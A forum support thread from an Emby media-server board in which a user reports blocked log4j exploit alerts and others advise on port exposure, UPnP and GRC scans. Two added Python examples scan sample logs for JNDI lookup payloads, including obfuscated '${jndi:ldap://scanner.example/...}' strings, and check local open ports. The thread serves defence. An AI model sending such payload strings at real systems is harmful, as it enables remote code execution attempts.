musicmafia 38 Posted May 21, 2023
I am not very tech savvy but my anti-virus program has flagged 8 of these in the last 3 weeks. I have XXXX out some data. Can anyone explain what is going on?
Columns: Time;Event;Action;Source;Target;Protocol;Rule/worm name;Application;Hash;User
Event: Security vulnerability exploitation attempt
Action: Blocked
Source: XX.XXX.XX.XXX:XXXX (unknown, different from my IP)
Target: XXX.XXX.X.XX:XXXX (Target is my IP)
Protocol: TCP
Rule/worm name: JAVA/Exploit.CVE-2021-44228
Application: C:\Users\XXXXXXXXX\AppData\Roaming\Emby-Server\system\EmbyServer.exe
Hash: XXXX026FDF550198XXXXA3385CDB159E1XXXXXX
Gilgamesh_48 1240 Posted May 21, 2023
I do not know that this is the case but every time something "flags" Emby it has turned out to be a false positive. That is what I expect this time. I would contact the anti-virus company you are using and tell them about this report.
musicmafia 38 (Author) Posted May 21, 2023
4 minutes ago, Gilgamesh_48 said:
I do not know that this is the case but every time something "flags" Emby it has turned out to be a false positive. That is what I expect this time. I would contact the anti-virus company you are using and tell them about this report.
That's what I am thinking as well, probably a false flag, but thought I should post to be on the safe side, since most people here know a lot more about this stuff than I do.
Luke 42078 Posted May 21, 2023
Hi, can you please attach the Emby server log? Thanks.
TeamB 2438 Posted May 22, 2023
4 hours ago, musicmafia said:
JAVA/Exploit.CVE-2021-44228
It's the log4j exploit. It looks like your firewall picked up the attack and stopped it. This looks like it was an external attack on your IP to the port Emby is running on.
musicmafia 38 (Author) Posted May 22, 2023
Well, that sounds scary, and it has happened 8 times in 3 weeks. At least my firewall stopped it. Is there anything I can do on my end?
musicmafia 38 (Author) Posted May 22, 2023
I looked at the dates the first attempts started and that correlates with me setting up my new smart TV, which is where I watch my movies from Emby.
Luke 42078 Posted May 22, 2023
1 hour ago, musicmafia said:
I looked at the dates the first attempts started and that correlates with me setting up my new smart TV, which is where I watch my movies from Emby.
That could actually be your TV sending out UPnP requests to Emby Server. @TeamB are you positive that you think it's external? Anyway, you could try turning off Emby Server DLNA features, then restart the server and the TV, and see if the flagging stops.
musicmafia 38 (Author) Posted May 22, 2023
10 minutes ago, Luke said:
.......Anyway, you could try turning off Emby Server DLNA features, then restart the server and the TV, and see if the flagging stops.
Thanks Luke. Here's what I have now. I don't think I clicked anything there, so I assume these are default settings? So I should untick all? Should I set my account as default user (it's blank now)?
Luke 42078 Posted May 22, 2023
Granted, it won't stop your TV from sending out UPnP queries; it will just stop the server from responding to them. So see if that helps.
TeamB 2438 Posted May 22, 2023
1 hour ago, Luke said:
That could actually be your TV sending out UPnP requests to Emby Server. @TeamB are you positive that you think it's external? Anyway, you could try turning off Emby Server DLNA features, then restart the server and the TV, and see if the flagging stops.
No, I don't. Given that the original info was censored:
Source: XX.XXX.XX.XXX:XXXX (unknown, different from my IP)
Target: XXX.XXX.X.XX:XXXX (Target is my IP)
I assumed "(unknown, different from my IP)" meant external. However, the log4j vulnerability is usually triggered remotely to run local code on a system. https://logging.apache.org/log4j/2.x/security.html It exploits a vulnerability in some special lookup capabilities in the log4j library that allowed an attacker to get log4j to download and run code. Due to log4j being so widespread and in so many systems and IoT devices, there are a lot of scanners out there that either try to exploit it or are just scanning for it so they can sell the IP on a list of vulnerable systems.
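An added example, not code from the thread or from the Emby project: the log4j lookup abuse TeamB describes is normally attempted by placing a `${jndi:...}` lookup string into something the server will log, such as a request path or User-Agent header. This Python script scans constructed, placeholder web-server log lines for that pattern, first undoing the nesting tricks (`${lower:j}`, `${::-j}`, `${env:X:-j}`) that scanners use to hide the literal string, so a defender can confirm that probes are reaching a service. The sample log lines, the `scanner.example` hostname and the 203.0.113.x addresses are made up for this example.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines for this example (not from the thread).
# Hosts such as scanner.example and the 203.0.113.x addresses are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/May/2023:10:01:02 +0000] "GET /emby/System/Info HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/May/2023:10:02:44 +0000] "GET / HTTP/1.1" 404 0 "-" "${jndi:ldap://scanner.example/a}"',
    '203.0.113.9 - - [22/May/2023:10:02:45 +0000] "GET /?x=${${lower:j}ndi:dns://scanner.example/b} HTTP/1.1" 404 0 "-" "curl/7.88"',
    '203.0.113.9 - - [22/May/2023:10:02:46 +0000] "GET / HTTP/1.1" 404 0 "-" "${${env:NOPE:-j}ndi:${::-l}${::-d}ap://scanner.example/c}"',
    '192.168.1.20 - - [22/May/2023:10:05:00 +0000] "GET /emby/Sessions HTTP/1.1" 200 2048 "-" "Emby/TV"',
]

# ${lower:x} / ${upper:x} only change case; for matching we keep the inner text.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:-default} (including the empty ${::-x} form) resolves to its default.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")
# After normalisation a JNDI lookup reads ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookup tricks until the text stops changing.

    Each round rewrites innermost ${lower:..}, ${upper:..} and ${..:-default}
    lookups to the text they would resolve to, exposing a hidden 'jndi'.
    """
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per log line that carries a JNDI lookup string."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize(line))
        if match:
            findings.append({
                "line": lineno,
                "scheme": match.group(1).lower(),  # ldap, dns, rmi, ...
                "source": line.split(" ", 1)[0],   # client IP field of the log line
                "raw": line,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['scheme']} lookup from {f['source']}")
```

A hit only shows that a probe arrived; whether it succeeded depends on the server actually running a vulnerable log4j, which the thread's Emby server (a .NET process) does not. The value of the scan is in counting and sourcing the probes so you can compare them with what the firewall reports.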
musicmafia 38 (Author) Posted May 22, 2023
Geez, this is sounding scarier by the day. Now my IP may be on a list as vulnerable? Is there anything more I can do to protect myself? @TeamB Source IP is 95.214.55.244 (which I looked up online, says Warsaw, Poland). All the attempts except the last one were made from that IP. The last attempt showed my own IP as the source AND target. Now my security is flagging with the message below. Does this mean they are cloning my IP and trying to exploit that way?
TeamB 2438 Posted May 23, 2023 (edited)
1 hour ago, musicmafia said:
Now my IP may be on a list as vulnerable?
Your system might not be vulnerable to the log4j exploit; think of this as someone knocking on your door to see if you are home or not. Only if your system is vulnerable would that move to the next step. Not sure about the last warning, it could be an IP spoof action or it could be you have been compromised. Or it could just be a weird DHCP glitch that has assigned one of your local devices the same IP address, which can happen but usually resolves itself reasonably quickly.
Edited May 23, 2023 by TeamB
musicmafia 38 (Author) Posted May 23, 2023
Although the first 8 attempts targeted the Emby port, it seems to change every couple of days. Today a new one started: ARP Cache Poisoning attack. Both source and target IP appear to be my IP except the last two digits. Since it has nothing to do with Emby I'll stop posting here and try to get help from Eset. Thanks again.
rbjtech 5284 Posted May 24, 2023 (edited)
On 23/05/2023 at 01:14, TeamB said:
your system might not be vulnerable to the log4j exploit, think of this as someone knocking on your door to see if you are home or not. Only if your system is vulnerable would that move to the next step.
Any internet-facing IP is vulnerable to 'probing' and there will be millions of probes happening every second of every day across the internet - that's unfortunately how it is. The important bit is this - any OPEN port is where the remote connection will have the connection opportunity and it will ATTEMPT a known vulnerability IF something is listening on that port. If you are getting lots of alerts, I would check that only the essential ports are open on your router - and ensure UPnP is turned off. If you are only using Emby for remote access, then using the standard ports, only 8096 (for http) and/or 8920 (for https) should be open. If other ports (80, 443, etc.) are open, then this is most likely why you are seeing 'attempts', because these are common ports and frequently probed. To reiterate, these are highly unlikely to be 'targeted' attempts - they are just run-of-the-mill 'port scans' - but do check the 'open' port status of your router. Something like GRC's port scanner will verify the 'open' ports - from a known source. (https://www.grc.com/x/ne.dll?bh0bkyd2)
Edited May 24, 2023 by rbjtech
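An added example, not code from the thread or from the Emby project, that automates the self-check rbjtech describes: probe a short list of ports on your own server and report any that answer but are not among the ports Emby needs (8096 for HTTP, 8920 for HTTPS). The candidate port list and the loopback default are assumptions for the example. Run it against the LAN address of the Emby machine to see what is listening there; the GRC scan from outside, which the post recommends, is still what tells you which of those ports the router actually exposes.

```python
import socket
import sys
from typing import Dict, Iterable, List

# The only ports the thread says should be open for remote Emby access.
EMBY_EXPECTED_PORTS = {8096, 8920}
# Ports to probe: the Emby ports plus the commonly scanned ones the post mentions.
# This list is an assumption for the example; extend it to suit your setup.
CANDIDATE_PORTS = [80, 443, 8096, 8920]


def probe_port(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a TCP connection to host:port is accepted (a service is listening).

    A refused connection and a timeout both count as 'not reachable'; this is a
    plain connect check, not a service fingerprint.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def probe_ports(host: str, ports: Iterable[int], timeout: float = 0.5) -> Dict[int, bool]:
    """Probe each port once and map port -> reachable."""
    return {port: probe_port(host, port, timeout) for port in ports}


def unexpected_open(results: Dict[int, bool],
                    expected: Iterable[int] = EMBY_EXPECTED_PORTS) -> List[int]:
    """Ports that answered but are not on the expected list, sorted ascending."""
    allowed = set(expected)
    return sorted(port for port, is_open in results.items() if is_open and port not in allowed)


def report(host: str, ports: Iterable[int] = CANDIDATE_PORTS) -> List[str]:
    """Summary lines; returned rather than printed so callers can reuse them."""
    results = probe_ports(host, ports)
    lines = [f"{host}:{port} {'open' if is_open else 'closed/filtered'}"
             for port, is_open in results.items()]
    extra = unexpected_open(results)
    if extra:
        lines.append(f"WARNING: unexpected open ports on {host}: {extra}")
    else:
        lines.append(f"OK: nothing listening on {host} beyond {sorted(EMBY_EXPECTED_PORTS)}")
    return lines


if __name__ == "__main__":
    # Usage: python port_check.py 192.168.1.10   (LAN address of the Emby server; placeholder)
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print("\n".join(report(target)))
```

A port that reports open here but 'stealth' from GRC is fine: the service exists on the LAN but the router is not forwarding it. The case worth fixing is the reverse, a port open from outside that is not on your expected list.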
Guest Posted May 24, 2023 (edited)
I like GRC's ShieldsUp! for a quick and free external port exposure check. I've used it for years (almost 2 decades now), especially every time I'm replacing or reconfiguring an internet-facing device. https://www.grc.com/shieldsup Click proceed to accept the agreement, then click all service ports and explore the results. Edit: Bear in mind this isn't actually scanning all ports and checking all protocols, but it's a good place to start.
Edited May 24, 2023 by andrewds
rbjtech 5284 Posted May 24, 2023
20 minutes ago, andrewds said:
I like GRC's ShieldsUp! for a quick and free external port exposure check. I've used it for years (almost 2 decades now), especially every time I'm replacing or reconfiguring an internet-facing device. https://www.grc.com/shieldsup Click proceed to accept the agreement, then click all service ports and explore the results. Edit: Bear in mind this isn't actually scanning all ports and checking all protocols, but it's a good place to start.
You can add any ports you like in a custom port scan - so by adding 8096/8920, you can actually see if Emby is listening (same as 'canyouseeme' etc).
Guest Posted May 24, 2023
Ideally what you'll see is that all ports, including even Emby, are stealth. I, for example, only expose my server instance externally to a couple of IPs for friends and family, so from the perspective of the GRC scan the ports will appear closed or ideally 'stealth', as in not responding at all. This does mean that if my friends or family change locations, their equipment reboots, or their internet provider does some kind of maintenance, their WAN IP address can change and they'll have to give it to me again so I can update my config to restore their access. But for me, I prefer that periodic inconvenience to increase security. If you see an open port, that means your Emby server instance is responding to requests from the open Internet, which is when you'll find yourself subject to probing for vulnerabilities. What you can do to mitigate this depends on your equipment and comfort level. I think a lot of people just rely on a reverse proxy for their setups.
Guest Posted May 25, 2023
@musicmafia we haven't heard from you in this thread for a couple of days. Please make sure you review https://emby.media/support/articles/advisory-23-05.html; especially given the context in this conversation and the emerging details described in that advisory, you really need to evaluate your configuration and secure your server.
musicmafia 38 (Author) Posted May 26, 2023 (edited)
To @andrewds and All: Wow, for some reason I didn't receive notifications that all of you had responded here! Thanks so much for all the help! Again, I don't know much about this stuff, but I did notice that the source and target IP flagged as the ARP Cache Poisoning Attack was the IP of my new smart TV. That led me to search threads related more specifically to how smart TVs can be the source of these types of issues. In the last few days I had recently taken the TV off wi-fi and instead switched to ethernet (via powerline adapters). I read that someone else experienced some similar flags when their TV was trying to connect to ethernet and wi-fi simultaneously. I realized that, although I was now connecting via ethernet, I had not removed the wi-fi as an option. So I removed the old wi-fi option from the network options on the TV and monitored my AV program closely, and lo and behold, knock on wood, I have had no further flags from Eset in the last two days! (Before, I was getting several per day.) I am hoping this solved the problem. I just now saw all your messages and I just used the GRC ShieldsUP and am pleased to report it said this: I take it everything looks proper now and I don't need to change anything with my router? Thanks again!
Edited May 26, 2023 by musicmafia
Guest Posted May 26, 2023 (edited)
Hello @musicmafia, I'm about to walk out the door so will be brief. Starting with checking out UPnP is good, but you need to run a port scan as well. And per the big red security advisory, make sure at the very least that all of your user accounts require a password for local login.
Edited May 26, 2023 by andrewds